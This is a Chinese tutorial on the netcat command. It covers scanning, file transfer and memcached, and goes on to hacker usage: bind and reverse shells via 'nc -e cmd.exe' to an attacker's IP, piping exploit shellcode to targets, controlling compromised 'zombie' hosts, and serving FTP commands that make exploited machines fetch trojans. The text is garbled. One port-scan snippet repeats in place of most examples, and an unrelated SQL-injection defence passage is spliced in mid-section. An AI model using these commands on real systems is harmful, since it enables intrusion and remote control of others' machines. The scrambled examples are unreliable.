这篇文章主要介绍了linux nc命令小结,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧

NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,又被大家称为“瑞士军刀”。nc - TCP/IP swiss army knife

linux nc命令小结(linux nc命令详解)  nc命令 第1张

nc 常用于溢出、反向链接、上传文本等。其实是一个非标准的 telnet 客户端程序。也是一个 putty.exe 客户端程序。

socat 是一个 nc 的替代品,可以称为 nc++。是netcat的N倍加强版。socat 支持的连接方式很多,有 ip、tcp、udp、ipv6、pipe、exec、system、open proxy、openssl 等

功能说明:功能强大的网络工具

语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>]
    [-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]

参  数:
  -g<网关>         设置路由器跃程通信网关,最多可设置8个。
  -G<指向器数目>   设置来源路由指向器,其数值为4的倍数。
  -h               在线帮助。
  -i<延迟秒数>     设置时间间隔,以便传送信息及扫描通信端口。
  -l               监听模式,用于入站连接 (监听本地端口)。
  -n               直接使用IP地址,而不通过域名服务器。
  -o<输出文件>     指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
  -p<通信端口>     设置本地主机使用的通信端口。
  -r               随机指定本地与远端主机的通信端口。
  -s<来源位址>     设置本地主机送出数据包的IP地址。
  -u               使用UDP传输协议。
  -v               显示指令执行过程。
  -w<超时秒数>     设置等待连线的时间。
  -z               使用0输入/输出模式,只在扫描通信端口时使用。

[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22

1)端口扫描

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-30000
# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc
# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 
root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!
nc -p 1234 -w 5 host.example.com 80

建立从本地1234端口到host.example.com的80端口连接,5秒超时

nc -u host.example.com 53

u为UDP连接

2) 远程拷贝文件

从server1拷贝文件到server2上。

先在server2上,用nc激活监听,server2上运行:

[root@hatest2 tmp]# nc -lp 1234 > install.log

server1上运行:

[root@hatest1 ~]# ll install.log
-rw-r--r--  1 root root 39693 12月 20  2007 install.log 
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

目的主机监听

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused0

源主机发起请求

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused1

netstat  如下

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused2

目录传输

从server1拷贝nginx-0.6.34目录内容到server2上。

先在server2上,用nc激活监听,server2上运行:

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused3

server1上运行:
[

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused4

从192.168.2.33拷贝文件到192.168.2.34

在192.168.2.34上: nc -l 1234 > test.txt

在192.168.2.33上: nc 192.168.2.34 < test.txt

克隆硬盘或分区

操作与上面的拷贝是雷同的,只需要由dd获得硬盘或分区的数据,然后传输即可。

克隆硬盘或分区的操作,不应在已经mount的的系统上进行。

所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix工具光盘)启动系统后,在server2上进行类似的监听动作:

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused5

server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused6

3) 简单聊天工具

在192.168.2.34上: nc -l 1234

在192.168.2.33上: nc 192.168.2.34 1234

这样,双方就可以相互交流了。使用ctrl+C(或D)退出。

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused7

在端口1234建立连接,互相发送输入

4) 保存Web页面

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused8

5) 模拟HTTP Headers

nc -v -z host.example.com 70-80      #扫描端口(70到80),可指定范围。-v输出详细信息。
nc -v -w 1 192.168.228.222 -z 1-1000
root@~# nc -v -w 2 192.168.2.34 -z 21-24  # 也可以不带-z参数试下效果
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused9

nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300000

连接到主机并执行

6) 用nc命令操作memcached
1)存储数据:printf “set key 0 10 6rnresultrn” |nc 192.168.2.34 11211
2)获取数据:printf “get keyrn” |nc 192.168.2.34 11211
3)删除数据:printf “delete keyrn” |nc 192.168.2.34 11211
4)查看状态:printf “statsrn” |nc 192.168.2.34 11211
5)模拟top命令查看状态:watch “echo stats” |nc 192.168.2.34 11211
6)清空缓存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)

 补充教程 2

nc的使用方法

netcat被誉为网络安全界的‘瑞士军刀',相信没有什么人不认识它吧......

一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑'编译后的新‘浓缩'版。‘浓缩'版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。

软件介绍:
工具名:Netcat
作者:Hobbit && Chris Wysopal
网址:http://www.atstake.com/research/tools/network_utilities/
类别:开放源码
平台:Linux/BSD/Unix/Windows
WINDOWS下版本号:[v1.10 NT]

参数介绍:

nc.exe -h 即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d          后台模式
-e          程序重定向,一旦连接,就执行 [危险!!]
-g gateway  source-routing hop point[s], up to 8    设置路由器跃程通信网关,最多可设置8个。
-G num      source-routing pointer: 4, 8, 12, ...   设置来源路由指向器,其数值为4的倍数。
-h          帮助信息
-i secs     延时的间隔
-l          监听模式,用于入站连接 (监听本地端口)
-L          连接关闭后,仍然继续监听
-n          指定数字的IP地址,不能用hostname。即直接使用IP地址,而不通过域名服务器。
-o file     指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
-p port     本地端口号 (指定本地端口 )
-r          随机本地及远程端口
-s addr     本地源地址
-t          使用TELNET交互方式(用telnet来回应 )
-u          UDP模式
-v          详细输出--用两个-v( -vv)可得到更详细的内容. 获得端口信息
-w secs     timeout的时间
-z          将输入输出关掉--只用于扫描. 端口的表示方法可写为M-N的范围格式。

基本用法:

大概有以下几种用法:

1) 连接到 remote 主机,例子:
    格式:nc -nvv 192.168.x.x 80
    讲解:连到192.168.x.x的TCP80端口
2) 监听 local 主机,例子:
    格式:nc -l -p 80
    讲解:监听本机的TCP80端口
3) 扫描远程主机,例子:
    格式:nc -nvv -w2 -z 192.168.x.x 80-445
    讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4) remote 主机绑定 shell,例子:
    格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
    讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5) REMOTE主机绑定SHELL并反向连接,例子:
    格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
    讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。
高级用法:
6) 作攻击程序用,例子:
    格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
    格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
    讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
    附:c:exploit.txt为shellcode等
7) 作蜜罐用[1],例子:
    格式:nc -L -p 80
    讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止.
8) 作蜜罐用[2],例子:
    格式:nc -L -p 80 > c:log.txt
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>'改为‘>>'即可以追加日志。
    附:c:log.txt为日志等
9)作蜜罐用[3],例子:
    格式1:nc -L -p 80 < c:honeypot.txt
    格式2:type.exe c:honeypot.txt|nc -L -p 80
    讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送'入其管道中。
          如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,
          欺骗系统授予访问权限。系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。
          如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,
          包括添加、删除或更新数据,甚至可能直接删除表。

二、如何防范?

好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。

⑴ 对于动态构造SQL查询的场合,可以使用下面的技术:

第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“Select * from Users Where login = or 1=1 AND password = or 1=1”显然会得到与“Select * from Users Where login = or 1=1 AND password = or 1=1”不同的结果。

第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“Select * from Users Where login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。

第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。

⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。

⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。

⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。

在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。

⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。

⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300001

打开本地的7626端口进行监听,并反馈连接信息。

如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象。再加个批处理文件一起用的话就是一个“小猪快跑”了。

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300002

如果要监视是否有入侵本地80端口的行为,并记下来用这个命令。这样,凡是有针对本机80端口的攻击都会被记录下来的

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300003

如果你通过溢出进入了别人的机器,就可以运行上面命令。作用都是以cmd.exe来响应到机器上123端口的连接。

这样就把溢出的主机变成了一台telnet肉鸡了。也可以用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 

在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777 。再在本地机器上运行: nc -l -p 777 

意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。你再在本地机上监听777端口,这样就进入了对方的cmd了 

这也微十时毫 反弹端口式木马的原理了。

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300004

获取192.168.0.25的80端口的信息。可以获得IIS版本等很多重要信息 的

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300005

扫描192.168.0.25的1到100间的TCP端口

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300006

这是扫描1到00间的UDP端口

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300007

扫描器

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300008

这样扫描会留下大量的痕迹,系统管理员会额外小心。

后门

root@10.1.1.43:~# nc -v -z -w2 127.0.0.1 1-100
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 80
root@10.1.1.43:~# nc -v -w 10 10.1.1.180 -z 80-300009

反向连接

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc0

或者:

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc1

139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP),这样就可以保证nc.exe优先于NETBIOS。

传送文件:

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc2

端口数据抓包.

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc3

telnet,自动批处理。

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc4

########################################
     管理肉鸡,更改肉鸡设置
########################################

1) 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver",使用winshell后门. 端口1234 密码password

命令格式就是:

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc5

2)

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc6

把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。
这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.

肉鸡特征:
1。unicode漏洞
2。guest密码为空,administrators组用户
3。其他漏洞
用于传输文件 — ncp

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc7

这样的话,我只要在A机器上先 QuackA# ncp ../abcd

listening on 然后在另一台机器B上

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc8

A机上出现

# 监听本地端口
root@10.1.1.43:~# nc -l -p 1234 
root@10.1.1.43:~# netstat -tunlp | grep 1234
tcp    0   0 0.0.0.0:1234      0.0.0.0:*        LISTEN   15543/nc9

===========================================================================
【本地运行】nc -v ip port
【命令解释】扫瞄某 IP 的某个端口,返回信息详细输出。
===========================================================================
【本地运行】nc -v -z ip port-port
【命令解释】扫描某IP的端口到某端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -v -z -u ip  port-port
【命令解释】扫描某 IP 的某 UDP 端口到某 UDP 端口,返回信息详细输出,但扫描速度较慢。
===========================================================================
【本地运行】nc -l -p 80
【命令解释】开启本机的 TCP 80 端口并监听。
===========================================================================
【本地运行】nc -l -v -p 80
【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。
===========================================================================
【本地运行】nc -l -p 80 > E:/log.dat
【命令解释】开启本机的 TCP 80 端口并将监听到的信息输出到 E:/log.dat 下的日志文件里。
===========================================================================
【本地运行】nc -nvv 192.168.1.101 80
【命令解释】连接到192.168.1.101主机的 80 端口。
===========================================================================
【本地运行】nc -nvv -w2 -z 192.168.1.101 80-1024
【命令解释】扫锚192.168.1.101的80-1024端口,连接超时时间为2秒。
===========================================================================
【远程运行】nc -l -p 2012 -t -e cmd.exe
【本地运行】nc -nvv 192.168.1.101 2012
【命令解释】采用正向连接方式,远程主机(注:假设IP地址为 192.168.1.101)上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到
【命令解释】2012 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 2012 用于
【命令解释】连接已经将 CMD 重定向到 2012 端口的远程主机(注:假设IP地址为 192.168.1.101)。
===========================================================================
【本地运行】nc -l -p 2012
【远程运行】nc -t -e cmd.exe 192.168.1.102 2012
【命令解释】采用反向连接方式,先在本地主机运行 nc -l -p 2012 开启本地主机的(注:假设IP地址为 192.168.1.102)2012 端口并监听等待远程主
【命令解释】机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为
【命令解释】2012 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。
===========================================================================
【本地运行】nc -v -n ip port < C:/sunzn.exe
【远程运行】nc -v -l -p port > D:/sunzn.exe
【命令解释】在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的
【命令解释】对应端口上(注:命令行中的 IP 为接收文件的远程主机 IP ),在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并
【命令解释】把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。
===========================================================================
【本地运行】nc -L -p 8989<C:\ftp.txt ( ftp.txt 中为FTP自动下载命令)
【命令解释】不停地监听 8989 端口,并把 C:\ftp.txt  中的内容发给任何一台连接本机 8989 端口的主机,可起到传送文件作用(此用法经常用于反向
【命令解释】溢出)。溢出远程主机时,一旦溢出的远程主机连接本地主机 8989 端口,远程主机就会自动用 FTP 下载指定的文件,如木马。
===========================================================================

简单使用教程:

命令1:监听命令

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 0

参数解释:
        -l:监听端口,监听入站信息
        -p:后跟本地端口号
        -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息

提示:一般大家都爱用-vv

    nc -l -p 80    //这个很简单,监听80端口。如果机器上运行这个命令,端口80被认为是开放的,可以欺骗扫描器
    nc -l -p 80 > e:\log.dat    //将详细信息写入E盘log.dat的日志文件
    nc -l -v -p 80    //和上边命令相似,会直接显示信息在运行着NC的屏幕上。

实践:

例如:nc -l -v -p 80

然后在浏览器中输入本机IP:127.0.0.1

命令2:程序定向(反弹shell的方法)

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 1

本地机: nc -l -p port 或 nc -l -v -p port
目标机:nc -e cmd.exe ip port

参数解释:
        -l、-p两个参数已经解释过了
        -e;作用就是程序定向
        -t:以telnet的形式来应答

例子

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 2

命令解释:

监听本地端口5277的入站信息,同时将CMD.exe这个程序,重定向到端口5277上,当有人连接的时候,就让程序CMD.exe以TELNET的形式来响应连接要求。说白了,其实就是让他成为一台TELNET的肉鸡,所以这个命令要运行在你的肉鸡上。

例如用法:

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 3

大家知道灰鸽子和神偷吧,这两款工具都是利用了反弹端口型的木马,

什么叫反弹端口?

就是说,当对方中马后,不用你主动和对方连接,也就是说不用从你的client端向对方主机上运行的server端发送请求连接,而是对方主动来连接你这样就可以使很多防火墙失效,因为很多防火墙都不检查出站请求的。

这里这两个命令结合在一起后,于那两款木马可以说有异曲同工之效。

本地运行:nc -l -p 5277 (监听本地5277端口)或者 nc -l -v -p 5277

然后在远程机器上,想办法运行 nc -e cmd.exe ip 5277

(你可别真的打“ip”在肉鸡上啊)要打,xxx.xxx.xxx.xxx这样!!

这样就是反弹~~在本地机器上得到了一个SHELL

命令3:扫描端口

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 4

参数解释:

-z:将输入输出关掉,在扫描时使用

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 5

例如:

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 6

例如:80端口

nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 7

例如:

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
